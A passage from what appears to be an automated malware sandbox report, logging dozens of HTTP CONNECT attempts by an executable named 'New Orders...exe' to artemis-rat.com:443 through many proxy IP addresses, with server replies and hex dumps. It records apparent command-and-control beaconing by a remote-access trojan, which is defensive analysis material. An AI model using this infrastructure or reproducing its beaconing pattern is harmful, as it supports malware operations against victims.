                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.94983558.234.116.19781977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.549921989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.949888178.128.156.21980007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.553467989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.777096033 CET32INHTTP/1.0 504 Gateway Timeout


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.94985398.162.25.29316797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.556920052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.949856174.64.199.8241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.561966896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.2.949925104.16.105.106807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.564548969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.718585014 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        36192.168.2.95001743.153.52.1554437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.566122055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.2.94993547.254.90.12588887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.600936890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.2.949881160.16.90.3531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.604255915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.953854084 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        39192.168.2.949818103.190.54.14180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.605245113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        40192.168.2.94988418.134.236.23131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.615468979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.906584024 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        41192.168.2.949867161.97.163.52641207672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.616847038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.304321051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.273111105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.242187977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.222208977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.095704079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945482969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        42192.168.2.94992072.10.160.9257757672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.621058941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        43192.168.2.949834220.248.70.23790027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.623903990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.030692101 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        44192.168.2.949948104.16.106.65807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.623943090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.777981043 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        45192.168.2.94988251.75.126.150378477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.634123087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.304316044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.226069927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.133131981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        46192.168.2.95006891.231.186.1334437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.641256094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        47192.168.2.949874103.78.96.14681817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.658085108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.978405952 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        48192.168.2.9498801.15.62.1256787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.667102098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.398035049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        49192.168.2.949871212.108.145.19590907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.671221972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        50192.168.2.949904119.28.60.6480907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.679642916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        51192.168.2.949979104.18.20.160807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.680057049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.834265947 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        52192.168.2.949939142.54.237.3441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.683883905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        53192.168.2.949886123.30.154.17177777672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.686508894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.044370890 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.10.3 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        54192.168.2.949914194.182.187.7831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.705214977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.097120047 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        55192.168.2.94995567.43.227.228263537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.705595016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.790617943 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        56192.168.2.950006172.67.181.197807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.706876040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.861236095 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        57192.168.2.94990965.109.152.8888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.708367109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.937311888 CET270INHTTP/1.1 503 Service Unavailable
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Mon, 11 Mar 2024 15:17:06 GMT
                                                                                        Content-Length: 102
                                                                                        Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 34 34 39 39 38 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a
                                                                                        Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:44998->1.1.1.1:53: i/o timeout


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        58192.168.2.950011104.27.15.161807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.712526083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
